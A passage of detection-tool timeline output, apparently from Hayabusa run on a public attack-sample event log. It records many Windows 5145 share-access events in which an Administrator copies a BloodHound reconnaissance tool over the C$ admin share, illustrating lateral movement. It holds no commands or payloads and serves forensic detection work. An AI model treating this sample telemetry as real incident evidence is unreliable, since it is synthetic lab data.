Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.968 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.978 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.988 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.988 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.988 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.988 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.998 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.998 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.008 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.008 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.008 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.008 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.018 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.018 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.018 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.028 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.028 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.028 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.028 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.038 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.038 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.038 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.038 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.048 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.048 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.048 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.048 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.058 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.058 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.058 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.058 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.068 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.068 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.068 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.068 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.078 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.078 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.078 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.078 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.088 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.088 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.088 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.088 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.098 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.098 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.098 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.098 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.108 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.108 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.108 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.119 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 